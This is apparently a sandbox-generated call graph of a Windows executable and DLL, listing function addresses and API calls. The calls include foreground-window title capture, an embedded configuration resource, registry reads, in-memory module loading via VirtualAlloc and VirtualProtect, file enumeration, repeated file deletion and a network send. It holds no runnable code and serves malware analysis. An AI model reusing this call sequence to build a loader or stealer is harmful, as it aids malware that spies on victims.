54021->54022 54023 41cf31 54022->54023 54027 41cee2 54022->54027 54024 41cf4b 54023->54024 54025 41d071 28 API calls 54023->54025 54041 41d1d7 28 API calls 54024->54041 54025->54024 54028 41cf1a 54027->54028 54032 41d071 54027->54032 54040 41d1d7 28 API calls 54028->54040 54031 41cf2d 54031->53972 54034 41d079 54032->54034 54033 41d0ab 54033->54028 54034->54033 54035 41d0af 54034->54035 54038 41d093 54034->54038 54052 402725 22 API calls 54035->54052 54042 41d0e2 54038->54042 54040->54031 54041->54031 54043 41d0ec __EH_prolog 54042->54043 54053 402717 22 API calls 54043->54053 54045 41d0ff 54054 41d1ee 11 API calls 54045->54054 54047 41d125 54048 41d15d 54047->54048 54055 402730 11 API calls 54047->54055 54048->54033 54050 41d144 54056 402712 11 API calls std::_Deallocate 54050->54056 54053->54045 54054->54047 54055->54050 54056->54048 54058 441edd 54057->54058 54061 441ccd 54058->54061 54060 41bc43 54060->53976 54062 441ce4 54061->54062 54064 441d1b _abort 54062->54064 54065 44062d 20 API calls __dosmaperr 54062->54065 54064->54060 54065->54064 54067 41bb46 GetForegroundWindow GetWindowTextW 54066->54067 54068 40417e 54067->54068 54069 404186 54068->54069 54074 402252 54069->54074 54071 404191 54078 4041bc 54071->54078 54075 40225c 54074->54075 54076 4022ac 54074->54076 54075->54076 54082 402779 11 API calls std::_Deallocate 54075->54082 54076->54071 54079 4041c8 54078->54079 54083 4041d9 54079->54083 54081 40419c 54081->53984 54082->54076 54084 4041e9 54083->54084 54085 404206 54084->54085 54086 4041ef 54084->54086 54100 4027e6 54085->54100 54090 404267 54086->54090 54089 404204 54089->54081 54091 402888 22 API calls 54090->54091 54092 40427b 54091->54092 54093 404290 54092->54093 54094 4042a5 54092->54094 54111 4042df 22 API calls 54093->54111 54095 4027e6 28 API calls 54094->54095 54099 4042a3 54095->54099 54097 404299 54112 402c48 22 API calls 54097->54112 54099->54089 54101 4027ef 54100->54101 54102 402851 54101->54102 54103 4027f9 54101->54103 54114 4028a4 22 API calls 54102->54114 54106 402802 54103->54106 54107 402815 54103->54107 54113 402aea 28 API calls __EH_prolog 54106->54113 54109 402813 54107->54109 54110 402252 11 API calls 54107->54110 54109->54089 54110->54109 54111->54097 54112->54099 54113->54109 54131 43ba8a 54115->54131 54117 43aed0 54137 43a837 54117->54137 54118 43ae95 54118->54117 54119 43aeaa 54118->54119 54130 43aeaf _abort 54118->54130 54136 44062d 20 API calls __dosmaperr 54119->54136 54123 43aedc 54124 43af0b 54123->54124 54145 43bacf 40 API calls __Tolower 54123->54145 54127 43af77 54124->54127 54146 43ba36 20 API calls 2 library calls 54124->54146 54147 43ba36 20 API calls 2 library calls 54127->54147 54128 43b03e _strftime 54128->54130 54148 44062d 20 API calls __dosmaperr 54128->54148 54130->53997 54132 43baa2 54131->54132 54133 43ba8f 54131->54133 54132->54118 54149 44062d 20 API calls __dosmaperr 54133->54149 54135 43ba94 _abort 54135->54118 54136->54130 54138 43a854 54137->54138 54139 43a84a 54137->54139 54138->54139 54150 448295 GetLastError 54138->54150 54139->54123 54141 43a875 54171 4483e4 36 API calls __Tolower 54141->54171 54143 43a88e 54172 448411 36 API calls __fassign 54143->54172 54145->54123 54146->54127 54147->54128 54148->54130 54149->54135 54151 4482b7 54150->54151 54152 4482ab 54150->54152 54174 445b74 20 API calls 3 library calls 54151->54174 54173 44883c 11 API calls 2 library calls 54152->54173 54155 4482b1 54155->54151 54157 448300 SetLastError 54155->54157 54156 4482c3 54158 4482cb 54156->54158 54181 448892 11 API calls 2 library calls 54156->54181 54157->54141 54175 446802 54158->54175 54160 4482e0 54160->54158 54163 4482e7 54160->54163 54162 4482d1 54164 44830c SetLastError 54162->54164 54182 448107 20 API calls __dosmaperr 54163->54182 54183 446175 36 API calls 4 library calls 54164->54183 54166 4482f2 54168 446802 _free 20 API calls 54166->54168 54170 4482f9 54168->54170 54169 448318 54170->54157 54170->54164 54171->54143 54172->54139 54173->54155 54174->54156 54176 44680d HeapFree 54175->54176 54177 446836 __dosmaperr 54175->54177 54176->54177 54178 446822 54176->54178 54177->54162 54184 44062d 20 API calls __dosmaperr 54178->54184 54180 446828 GetLastError 54180->54177 54181->54160 54182->54166 54183->54169 54184->54180 54189 40515c 102 API calls 54186->54189 54188 405159 54189->54188 54190->53854 54191->53859 54192->53861 54193 44839e 54201 448790 54193->54201 54196 4483b2 54198 4483ba 54199 4483c7 54198->54199 54209 4483ca 11 API calls 54198->54209 54202 44854a __dosmaperr 5 API calls 54201->54202 54203 4487b7 54202->54203 54204 4487cf TlsAlloc 54203->54204 54205 4487c0 54203->54205 54204->54205 54206 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54205->54206 54207 4483a8 54206->54207 54207->54196 54208 448319 20 API calls 3 library calls 54207->54208 54208->54198 54209->54196 54210 100020db 54213 100020e7 ___scrt_is_nonwritable_in_current_image 54210->54213 54211 100020f6 54212 10002110 dllmain_raw 54212->54211 54214 1000212a 54212->54214 54213->54211 54213->54212 54218 1000210b 54213->54218 54223 10001eec 54214->54223 54216 10002177 54216->54211 54217 10001eec 29 API calls 54216->54217 54219 1000218a 54217->54219 54218->54211 54218->54216 54220 10001eec 29 API calls 54218->54220 54219->54211 54221 10002193 dllmain_raw 54219->54221 54222 1000216d dllmain_raw 54220->54222 54221->54211 54222->54216 54224 10001ef7 54223->54224 54225 10001f2a dllmain_crt_process_detach 54223->54225 54226 10001f1c dllmain_crt_process_attach 54224->54226 54227 10001efc 54224->54227 54232 10001f06 54225->54232 54226->54232 54228 10001f01 54227->54228 54229 10001f12 54227->54229 54228->54232 54233 1000240b 25 API calls 54228->54233 54234 100023ec 27 API calls 54229->54234 54232->54218 54233->54232 54234->54232 54235 434918 54236 434924 ___DestructExceptionObject 54235->54236 54262 434627 54236->54262 54238 43492b 54240 434954 54238->54240 54568 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54238->54568 54249 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54240->54249 54273 4442d2 54240->54273 54244 434973 ___DestructExceptionObject 54245 4349f3 54281 434ba5 54245->54281 54249->54245 54569 443487 36 API calls 3 library calls 54249->54569 54263 434630 54262->54263 54574 434cb6 IsProcessorFeaturePresent 54263->54574 54265 43463c 54575 438fb1 54265->54575 54267 434641 54268 434645 54267->54268 54584 44415f 54267->54584 54268->54238 54271 43465c 54271->54238 54275 4442e9 54273->54275 54274 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54276 43496d 54274->54276 54275->54274 54276->54244 54277 444276 54276->54277 54278 4442a5 54277->54278 54279 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54278->54279 54280 4442ce 54279->54280 54280->54249 54282 436f10 ___scrt_get_show_window_mode 54281->54282 54283 434bb8 GetStartupInfoW 54282->54283 54284 4349f9 54283->54284 54285 444223 54284->54285 54634 44f0d9 54285->54634 54287 44422c 54289 434a02 54287->54289 54638 446895 36 API calls 54287->54638 54290 40ea00 54289->54290 54768 41cbe1 LoadLibraryA GetProcAddress 54290->54768 54292 40ea1c GetModuleFileNameW 54773 40f3fe 54292->54773 54294 40ea38 54295 4020f6 28 API calls 54294->54295 54296 40ea47 54295->54296 54297 4020f6 28 API calls 54296->54297 54298 40ea56 54297->54298 54299 41beac 28 API calls 54298->54299 54300 40ea5f 54299->54300 54788 40fb52 54300->54788 54302 40ea68 54303 401e8d 11 API calls 54302->54303 54304 40ea71 54303->54304 54305 40ea84 54304->54305 54306 40eace 54304->54306 54982 40fbee 118 API calls 54305->54982 54308 401e65 22 API calls 54306->54308 54310 40eade 54308->54310 54309 40ea96 54311 401e65 22 API calls 54309->54311 54313 401e65 22 API calls 54310->54313 54312 40eaa2 54311->54312 54983 410f72 36 API calls __EH_prolog 54312->54983 54314 40eafd 54313->54314 54315 40531e 28 API calls 54314->54315 54317 40eb0c 54315->54317 54319 406383 28 API calls 54317->54319 54318 40eab4 54984 40fb9f 78 API calls 54318->54984 54321 40eb18 54319->54321 54323 401fe2 28 API calls 54321->54323 54322 40eabd 54985 40f3eb 71 API calls 54322->54985 54325 40eb24 54323->54325 54326 401fd8 11 API calls 54325->54326 54327 40eb2d 54326->54327 54329 401fd8 11 API calls 54327->54329 54331 40eb36 54329->54331 54332 401e65 22 API calls 54331->54332 54333 40eb3f 54332->54333 54334 401fc0 28 API calls 54333->54334 54335 40eb4a 54334->54335 54336 401e65 22 API calls 54335->54336 54337 40eb63 54336->54337 54338 401e65 22 API calls 54337->54338 54339 40eb7e 54338->54339 54340 40ebe9 54339->54340 54986 406c59 54339->54986 54341 401e65 22 API calls 54340->54341 54347 40ebf6 54341->54347 54343 40ebab 54344 401fe2 28 API calls 54343->54344 54345 40ebb7 54344->54345 54346 401fd8 11 API calls 54345->54346 54349 40ebc0 54346->54349 54348 40ec3d 54347->54348 54353 413584 3 API calls 54347->54353 54792 40d0a4 54348->54792 54991 413584 RegOpenKeyExA 54349->54991 54359 40ec21 54353->54359 54357 40f38a 55084 4139e4 30 API calls 54357->55084 54359->54348 54994 4139e4 30 API calls 54359->54994 54367 40f3a0 55085 4124b0 65 API calls ___scrt_get_show_window_mode 54367->55085 54568->54238 54569->54245 54574->54265 54576 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54575->54576 54588 43a4ba 54576->54588 54580 438fcc 54581 438fd7 54580->54581 54602 43a4f6 DeleteCriticalSection 54580->54602 54581->54267 54583 438fc4 54583->54267 54630 44fbe8 54584->54630 54587 438fda 8 API calls 3 library calls 54587->54268 54589 43a4c3 54588->54589 54591 43a4ec 54589->54591 54593 438fc0 54589->54593 54603 438eff 54589->54603 54608 43a4f6 DeleteCriticalSection 54591->54608 54593->54583 54594 43a46c 54593->54594 54623 438e14 54594->54623 54596 43a476 54597 43a481 54596->54597 54628 438ec2 6 API calls try_get_function 54596->54628 54597->54580 54599 43a48f 54600 43a49c 54599->54600 54629 43a49f 6 API calls ___vcrt_FlsFree 54599->54629 54600->54580 54602->54583 54609 438cf3 54603->54609 54606 438f36 InitializeCriticalSectionAndSpinCount 54607 438f22 54606->54607 54607->54589 54608->54593 54610 438d23 54609->54610 54611 438d27 54609->54611 54610->54611 54613 438d47 54610->54613 54616 438d93 54610->54616 54611->54606 54611->54607 54613->54611 54614 438d53 GetProcAddress 54613->54614 54615 438d63 __crt_fast_encode_pointer 54614->54615 54615->54611 54617 438dbb LoadLibraryExW 54616->54617 54622 438db0 54616->54622 54618 438dd7 GetLastError 54617->54618 54621 438def 54617->54621 54619 438de2 LoadLibraryExW 54618->54619 54618->54621 54619->54621 54620 438e06 FreeLibrary 54620->54622 54621->54620 54621->54622 54622->54610 54624 438cf3 try_get_function 5 API calls 54623->54624 54625 438e2e 54624->54625 54626 438e37 54625->54626 54627 438e46 TlsAlloc 54625->54627 54626->54596 54628->54599 54629->54597 54633 44fc01 54630->54633 54631 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54632 43464e 54631->54632 54632->54271 54632->54587 54633->54631 54635 44f0eb 54634->54635 54636 44f0e2 54634->54636 54635->54287 54639 44efd8 54636->54639 54638->54287 54640 448295 _abort 36 API calls 54639->54640 54641 44efe5 54640->54641 54659 44f0f7 54641->54659 54643 44efed 54668 44ed6c 54643->54668 54646 44f004 54646->54635 54649 44f047 54652 446802 _free 20 API calls 54649->54652 54652->54646 54653 44f042 54692 44062d 20 API calls __dosmaperr 54653->54692 54655 44f08b 54655->54649 54693 44ec42 20 API calls 54655->54693 54656 44f05f 54656->54655 54657 446802 _free 20 API calls 54656->54657 54657->54655 54660 44f103 ___DestructExceptionObject 54659->54660 54661 448295 _abort 36 API calls 54660->54661 54666 44f10d 54661->54666 54663 44f191 ___DestructExceptionObject 54663->54643 54666->54663 54667 446802 _free 20 API calls 54666->54667 54694 446175 36 API calls 4 library calls 54666->54694 54695 445909 EnterCriticalSection 54666->54695 54696 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54666->54696 54667->54666 54669 43a837 __fassign 36 API calls 54668->54669 54670 44ed7e 54669->54670 54671 44ed8d GetOEMCP 54670->54671 54672 44ed9f 54670->54672 54674 44edb6 54671->54674 54673 44eda4 GetACP 54672->54673 54672->54674 54673->54674 54674->54646 54675 4461b8 54674->54675 54676 4461f6 54675->54676 54677 4461c6 __Getctype 54675->54677 54698 44062d 20 API calls __dosmaperr 54676->54698 54677->54676 54678 4461e1 RtlAllocateHeap 54677->54678 54697 443001 7 API calls 2 library calls 54677->54697 54678->54677 54680 4461f4 54678->54680 54680->54649 54682 44f199 54680->54682 54683 44ed6c 38 API calls 54682->54683 54684 44f1b8 54683->54684 54687 44f209 IsValidCodePage 54684->54687 54689 44f1bf 54684->54689 54691 44f22e ___scrt_get_show_window_mode 54684->54691 54685 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54686 44f03a 54685->54686 54686->54653 54686->54656 54688 44f21b GetCPInfo 54687->54688 54687->54689 54688->54689 54688->54691 54689->54685 54699 44ee44 GetCPInfo 54691->54699 54692->54649 54693->54649 54694->54666 54695->54666 54696->54666 54697->54677 54698->54680 54700 44ef28 54699->54700 54701 44ee7e 54699->54701 54704 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54700->54704 54709 4511ac 54701->54709 54706 44efd4 54704->54706 54706->54689 54708 44aee6 _swprintf 41 API calls 54708->54700 54710 43a837 __fassign 36 API calls 54709->54710 54711 4511cc MultiByteToWideChar 54710->54711 54713 45120a 54711->54713 54720 4512a2 54711->54720 54715 4461b8 ___crtLCMapStringA 21 API calls 54713->54715 54719 45122b __alloca_probe_16 ___scrt_get_show_window_mode 54713->54719 54714 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54716 44eedf 54714->54716 54715->54719 54723 44aee6 54716->54723 54717 45129c 54728 435ecd 20 API calls _free 54717->54728 54719->54717 54721 451270 MultiByteToWideChar 54719->54721 54720->54714 54721->54717 54722 45128c GetStringTypeW 54721->54722 54722->54717 54724 43a837 __fassign 36 API calls 54723->54724 54725 44aef9 54724->54725 54729 44acc9 54725->54729 54728->54720 54730 44ace4 ___crtLCMapStringA 54729->54730 54731 44ad0a MultiByteToWideChar 54730->54731 54732 44ad34 54731->54732 54733 44aebe 54731->54733 54737 4461b8 ___crtLCMapStringA 21 API calls 54732->54737 54739 44ad55 __alloca_probe_16 54732->54739 54734 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54733->54734 54735 44aed1 54734->54735 54735->54708 54736 44ad9e MultiByteToWideChar 54738 44adb7 54736->54738 54751 44ae0a 54736->54751 54737->54739 54756 448c33 54738->54756 54739->54736 54739->54751 54743 44ade1 54747 448c33 _strftime 11 API calls 54743->54747 54743->54751 54744 44ae19 54745 4461b8 ___crtLCMapStringA 21 API calls 54744->54745 54750 44ae3a __alloca_probe_16 54744->54750 54745->54750 54746 44aeaf 54764 435ecd 20 API calls _free 54746->54764 54747->54751 54749 448c33 _strftime 11 API calls 54752 44ae8e 54749->54752 54750->54746 54750->54749 54765 435ecd 20 API calls _free 54751->54765 54752->54746 54753 44ae9d WideCharToMultiByte 54752->54753 54753->54746 54754 44aedd 54753->54754 54766 435ecd 20 API calls _free 54754->54766 54757 44854a __dosmaperr 5 API calls 54756->54757 54758 448c5a 54757->54758 54761 448c63 54758->54761 54767 448cbb 10 API calls 3 library calls 54758->54767 54760 448ca3 LCMapStringW 54760->54761 54762 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54761->54762 54763 448cb5 54762->54763 54763->54743 54763->54744 54763->54751 54764->54751 54765->54733 54766->54751 54767->54760 54769 41cc20 LoadLibraryA GetProcAddress 54768->54769 54770 41cc10 GetModuleHandleA GetProcAddress 54768->54770 54771 41cc49 44 API calls 54769->54771 54772 41cc39 LoadLibraryA GetProcAddress 54769->54772 54770->54769 54771->54292 54772->54771 55086 41b539 FindResourceA 54773->55086 54776 43bda0 _Yarn 21 API calls 54777 40f428 _Yarn 54776->54777 54778 4020b7 28 API calls 54777->54778 54779 40f443 54778->54779 54780 401fe2 28 API calls 54779->54780 54781 40f44e 54780->54781 54782 401fd8 11 API calls 54781->54782 54783 40f457 54782->54783 54784 43bda0 _Yarn 21 API calls 54783->54784 54785 40f468 _Yarn 54784->54785 55089 406e13 54785->55089 54787 40f49b 54787->54294 54789 40fb5e 54788->54789 54791 40fb65 54788->54791 55092 402163 11 API calls 54789->55092 54791->54302 55093 401fab 54792->55093 54982->54309 54983->54318 54984->54322 54987 4020df 11 API calls 54986->54987 54988 406c65 54987->54988 54989 4032a0 28 API calls 54988->54989 54990 406c82 54989->54990 54990->54343 54992 40ebdf 54991->54992 54993 4135ae RegQueryValueExA RegCloseKey 54991->54993 54992->54340 54992->54357 54993->54992 54994->54348 55084->54367 55087 41b556 LoadResource LockResource SizeofResource 55086->55087 55088 40f419 55086->55088 55087->55088 55088->54776 55090 4020b7 28 API calls 55089->55090 55091 406e27 55090->55091 55091->54787 55092->54791 55598 4129da 55599 4129ec 55598->55599 55600 4041a2 28 API calls 55599->55600 55601 4129ff 55600->55601 55602 4020f6 28 API calls 55601->55602 55603 412a0e 55602->55603 55604 4020f6 28 API calls 55603->55604 55605 412a1d 55604->55605 55606 41beac 28 API calls 55605->55606 55607 412a26 55606->55607 55608 412ace 55607->55608 55610 401e65 22 API calls 55607->55610 55609 401e8d 11 API calls 55608->55609 55611 412ad7 55609->55611 55612 412a3d 55610->55612 55613 401fd8 11 API calls 55611->55613 55614 4020f6 28 API calls 55612->55614 55615 412ae0 55613->55615 55616 412a48 55614->55616 55617 401fd8 11 API calls 55615->55617 55618 401e65 22 API calls 55616->55618 55619 412ae8 55617->55619 55620 412a53 55618->55620 55621 4020f6 28 API calls 55620->55621 55622 412a5e 55621->55622 55623 401e65 22 API calls 55622->55623 55624 412a69 55623->55624 55625 4020f6 28 API calls 55624->55625 55626 412a74 55625->55626 55627 401e65 22 API calls 55626->55627 55628 412a7f 55627->55628 55629 4020f6 28 API calls 55628->55629 55630 412a8a 55629->55630 55631 401e65 22 API calls 55630->55631 55632 412a95 55631->55632 55633 4020f6 28 API calls 55632->55633 55634 412aa0 55633->55634 55635 401e65 22 API calls 55634->55635 55636 412aae 55635->55636 55637 4020f6 28 API calls 55636->55637 55638 412ab9 55637->55638 55642 412aef GetModuleFileNameW 55638->55642 55641 404e26 99 API calls 55641->55608 55643 4020df 11 API calls 55642->55643 55644 412b1a 55643->55644 55645 4020df 11 API calls 55644->55645 55646 412b26 55645->55646 55647 4020df 11 API calls 55646->55647 55670 412b32 55647->55670 55648 40da23 32 API calls 55648->55670 55649 401fd8 11 API calls 55649->55670 55650 41ba09 43 API calls 55650->55670 55651 4185a3 31 API calls 55651->55670 55652 412c58 Sleep 55652->55670 55653 40417e 28 API calls 55653->55670 55654 4042fc 84 API calls 55654->55670 55655 40431d 28 API calls 55655->55670 55656 401f09 11 API calls 55656->55670 55657 412cfa Sleep 55657->55670 55658 403014 28 API calls 55658->55670 55659 412d9c Sleep 55659->55670 55660 41c516 32 API calls 55660->55670 55661 412dff DeleteFileW 55661->55670 55662 412e36 DeleteFileW 55662->55670 55663 412e61 55665 412e72 DeleteFileW 55663->55665 55663->55670 55678 401f09 11 API calls 55663->55678 55681 412eff 55663->55681 55664 412e88 Sleep 55664->55670 55665->55670 55666 412f01 55667 401f09 11 API calls 55666->55667 55668 412f0d 55667->55668 55669 401f09 11 API calls 55668->55669 55671 412f19 55669->55671 55670->55648 55670->55649 55670->55650 55670->55651 55670->55652 55670->55653 55670->55654 55670->55655 55670->55656 55670->55657 55670->55658 55670->55659 55670->55660 55670->55661 55670->55662 55670->55663 55670->55664 55670->55666 55674 412ecd Sleep 55670->55674 55672 401f09 11 API calls 55671->55672 55673 412f25 55672->55673 55675 40b93f 28 API calls 55673->55675 55676 401f09 11 API calls 55674->55676 55677 412f38 55675->55677 55676->55663 55679 4020f6 28 API calls 55677->55679 55678->55663 55680 412f58 55679->55680 55789 413268 55680->55789 55681->55673 55684 401f09 11 API calls 55685 412f6f 55684->55685 55686 4130e3 55685->55686 55687 412f8f 55685->55687 55688 41bdaf 28 API calls 55686->55688 55689 41bdaf 28 API calls 55687->55689 55690 4130ec 55688->55690 55691 412f9b 55689->55691 55692 402f31 28 API calls 55690->55692 55693 41bc1f 28 API calls 55691->55693 55694 413123 55692->55694 55695 412fb5 55693->55695 55696 402f10 28 API calls 55694->55696 55697 402f31 28 API calls 55695->55697 55698 413132 55696->55698 55699 412fe5 55697->55699 55700 402f10 28 API calls 55698->55700 55701 402f10 28 API calls 55699->55701 55702 41313e 55700->55702 55703 412ff4 55701->55703 55704 402f10 28 API calls 55702->55704 55705 402f10 28 API calls 55703->55705 55706 41314d 55704->55706 55707 413003 55705->55707 55708 402f10 28 API calls 55706->55708 55709 402f10 28 API calls 55707->55709 55711 41315c 55708->55711 55710 413012 55709->55710 55713 402f10 28 API calls 55710->55713 55712 402f10 28 API calls 55711->55712 55714 41316b 55712->55714 55715 413021 55713->55715 55716 402f10 28 API calls 55714->55716 55717 402f10 28 API calls 55715->55717 55718 41317a 55716->55718 55719 41302d 55717->55719 55803 402ea1 28 API calls 55718->55803 55721 402f10 28 API calls 55719->55721 55723 413039 55721->55723 55722 413184 55724 404aa1 61 API calls 55722->55724 55801 402ea1 28 API calls 55723->55801 55726 413191 55724->55726 55728 401fd8 11 API calls 55726->55728 55727 413048 55729 402f10 28 API calls 55727->55729 55730 41319d 55728->55730 55731 413054 55729->55731 55732 401fd8 11 API calls 55730->55732 55802 402ea1 28 API calls 55731->55802 55734 4131a9 55732->55734 55736 401fd8 11 API calls 55734->55736 55735 41305e 55737 404aa1 61 API calls 55735->55737 55738 4131b5 55736->55738 55739 41306b 55737->55739 55740 401fd8 11 API calls 55738->55740 55741 401fd8 11 API calls 55739->55741 55743 4131c1 55740->55743 55742 413074 55741->55742 55745 401fd8 11 API calls 55742->55745 55744 401fd8 11 API calls 55743->55744 55746 4131ca 55744->55746 55747 41307d 55745->55747 55748 401fd8 11 API calls 55746->55748 55749 401fd8 11 API calls 55747->55749 55750 4131d3 55748->55750 55751 413086 55749->55751 55752 401fd8 11 API calls 55750->55752 55753 401fd8 11 API calls 55751->55753 55754 4130d7 55752->55754 55755 41308f 55753->55755 55757 401fd8 11 API calls 55754->55757 55756 401fd8 11 API calls 55755->55756 55758 41309b 55756->55758 55759 4131e5 55757->55759 55760 401fd8 11 API calls 55758->55760 55761 401f09 11 API calls 55759->55761 55762 4130a7 55760->55762 55763 4131f1 55761->55763 55764 401fd8 11 API calls 55762->55764 55765 401fd8 11 API calls 55763->55765 55766 4130b3 55764->55766 55767 4131fd 55765->55767 55768 401fd8 11 API calls 55766->55768 55769 401fd8 11 API calls 55767->55769 55770 4130bf 55768->55770 55771 413209 55769->55771 55772 401fd8 11 API calls 55770->55772 55774 401fd8 11 API calls 55771->55774 55773 4130cb 55772->55773 55776 401fd8 11 API calls 55773->55776 55775 413215 55774->55775 55777 401fd8 11 API calls 55775->55777 55776->55754 55778 413221 55777->55778 55779 401fd8 11 API calls 55778->55779 55780 41322d 55779->55780 55781 401fd8 11 API calls 55780->55781 55782 413239 55781->55782 55783 401fd8 11 API calls 55782->55783 55784 413245 55783->55784 55785 401fd8 11 API calls 55784->55785 55786 413251 55785->55786 55787 401fd8 11 API calls 55786->55787 55788 412abe 55787->55788 55788->55641 55790 4132a6 55789->55790 55792 413277 55789->55792 55791 4132b5 55790->55791 55804 10001c5b 55790->55804 55793 40417e 28 API calls 55791->55793 55808 411d2d 55792->55808 55795 4132c1 55793->55795 55797 401fd8 11 API calls 55795->55797 55799 412f63 55797->55799 55799->55684 55801->55727 55802->55735 55803->55722 55805 10001c6b ___scrt_fastfail 55804->55805 55812 100012ee 55805->55812 55807 10001c87 55807->55791 55854 411d39 55808->55854 55811 411fa2 22 API calls _Yarn 55811->55790 55813 10001324 ___scrt_fastfail 55812->55813 55814 100013b7 GetEnvironmentVariableW 55813->55814 55838 100010f1 55814->55838 55817 100010f1 51 API calls 55818 10001465 55817->55818 55819 100010f1 51 API calls 55818->55819 55820 10001479 55819->55820 55821 100010f1 51 API calls 55820->55821 55822 1000148d 55821->55822 55823 100010f1 51 API calls 55822->55823 55824 100014a1 55823->55824 55825 100010f1 51 API calls 55824->55825 55826 100014b5 lstrlenW 55825->55826 55827 100014d9 lstrlenW 55826->55827 55837 100014d2 55826->55837 55828 100010f1 51 API calls 55827->55828 55829 10001501 lstrlenW lstrcatW 55828->55829 55830 100010f1 51 API calls 55829->55830 55831 10001539 lstrlenW lstrcatW 55830->55831 55832 100010f1 51 API calls 55831->55832 55833 1000156b lstrlenW lstrcatW 55832->55833 55834 100010f1 51 API calls 55833->55834 55835 1000159d lstrlenW lstrcatW 55834->55835 55836 100010f1 51 API calls 55835->55836 55836->55837 55837->55807 55839 10001118 ___scrt_fastfail 55838->55839 55840 10001129 lstrlenW 55839->55840 55851 10002c40 55840->55851 55842 10001148 lstrcatW lstrlenW 55843 10001177 lstrlenW FindFirstFileW 55842->55843 55844 10001168 lstrlenW 55842->55844 55845 100011a0 55843->55845 55846 100011e1 55843->55846 55844->55843 55847 100011c7 FindNextFileW 55845->55847 55848 100011aa 55845->55848 55846->55817 55847->55845 55850 100011da FindClose 55847->55850 55848->55847 55853 10001000 51 API calls ___scrt_fastfail 55848->55853 55850->55846 55852 10002c57 55851->55852 55852->55842 55852->55852 55853->55848 55889 4117d7 55854->55889 55856 411d57 55857 411d6d SetLastError 55856->55857 55858 4117d7 SetLastError 55856->55858 55885 411d35 55856->55885 55857->55885 55859 411d8a 55858->55859 55859->55857 55861 411dac GetNativeSystemInfo 55859->55861 55859->55885 55862 411df2 55861->55862 55873 411dff SetLastError 55862->55873 55892 411cde VirtualAlloc 55862->55892 55865 411e22 55866 411e47 GetProcessHeap HeapAlloc 55865->55866 55918 411cde VirtualAlloc 55865->55918 55867 411e70 55866->55867 55868 411e5e 55866->55868 55871 4117d7 SetLastError 55867->55871 55919 411cf5 VirtualFree 55868->55919 55874 411eb9 55871->55874 55872 411e3a 55872->55866 55872->55873 55873->55885 55875 411f6b 55874->55875 55893 411cde VirtualAlloc 55874->55893 55920 4120b2 GetProcessHeap HeapFree 55875->55920 55878 411ed2 _Yarn 55894 4117ea 55878->55894 55880 411efe 55880->55875 55898 411b9a 55880->55898 55884 411f36 55884->55875 55884->55885 55914 1000220c 55884->55914 55885->55811 55886 411f5c 55886->55885 55887 411f60 SetLastError 55886->55887 55887->55875 55890 4117e6 55889->55890 55891 4117db SetLastError 55889->55891 55890->55856 55891->55856 55892->55865 55893->55878 55895 4118c0 55894->55895 55896 411816 _Yarn ___scrt_get_show_window_mode 55894->55896 55895->55880 55896->55895 55897 4117d7 SetLastError 55896->55897 55897->55896 55899 411bbb IsBadReadPtr 55898->55899 55906 411ca5 55898->55906 55902 411bd5 55899->55902 55899->55906 55903 411cbd SetLastError 55902->55903 55904 411ca7 SetLastError 55902->55904 55905 411c8a IsBadReadPtr 55902->55905 55902->55906 55921 440f5d 55902->55921 55903->55906 55904->55906 55905->55902 55905->55906 55906->55875 55908 41198a 55906->55908 55912 4119b0 55908->55912 55909 411a99 55910 4118ed VirtualProtect 55909->55910 55911 411aab 55910->55911 55911->55884 55912->55909 55912->55911 55936 4118ed 55912->55936 55915 10002215 55914->55915 55916 1000221a dllmain_dispatch 55914->55916 55940 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55915->55940 55916->55886 55918->55872 55919->55873 55920->55885 55922 446206 55921->55922 55923 446213 55922->55923 55924 44621e 55922->55924 55925 4461b8 ___crtLCMapStringA 21 API calls 55923->55925 55926 446226 55924->55926 55932 44622f __Getctype 55924->55932 55930 44621b 55925->55930 55927 446802 _free 20 API calls 55926->55927 55927->55930 55928 446234 55934 44062d 20 API calls __dosmaperr 55928->55934 55929 446259 HeapReAlloc 55929->55930 55929->55932 55930->55902 55932->55928 55932->55929 55935 443001 7 API calls 2 library calls 55932->55935 55934->55930 55935->55932 55937 4118fe 55936->55937 55939 4118f6 55936->55939 55938 411971 VirtualProtect 55937->55938 55937->55939 55938->55939 55939->55912 55940->55916 55941 42f97e 55942 42f989 55941->55942 55943 42f99d 55942->55943 55945 432f7f 55942->55945 55946 432f8a 55945->55946 55947 432f8e 55945->55947 55946->55943 55948 440f5d 22 API calls 55947->55948 55948->55946 55949 40165e 55950 401666 55949->55950 55952 401669 55949->55952 55951 4016a8 55953 43455e new 22 API calls 55951->55953 55952->55951 55954 401696 55952->55954 55955 40169c 55953->55955 55956 43455e new 22 API calls 55954->55956 55956->55955 55957 426cdc 55962 426d59 send 55957->55962 55963 10001f3f 55964 10001f4b ___scrt_is_nonwritable_in_current_image 55963->55964 55981 1000247c 55964->55981 55966 10001f52 55967 10002041 55966->55967 55968 10001f7c 55966->55968 55974 10001f57 ___scrt_is_nonwritable_in_current_image 55966->55974 55997 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55967->55997 55992 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55968->55992 55971 10002048 55972 10001f8b __RTC_Initialize 55972->55974 55993 100022fc RtlInitializeSListHead 55972->55993 55975 10001f99 ___scrt_initialize_default_local_stdio_options 55994 100046c5 5 API calls _ValidateLocalCookies 55975->55994 55977 10001fad 55977->55974 55995 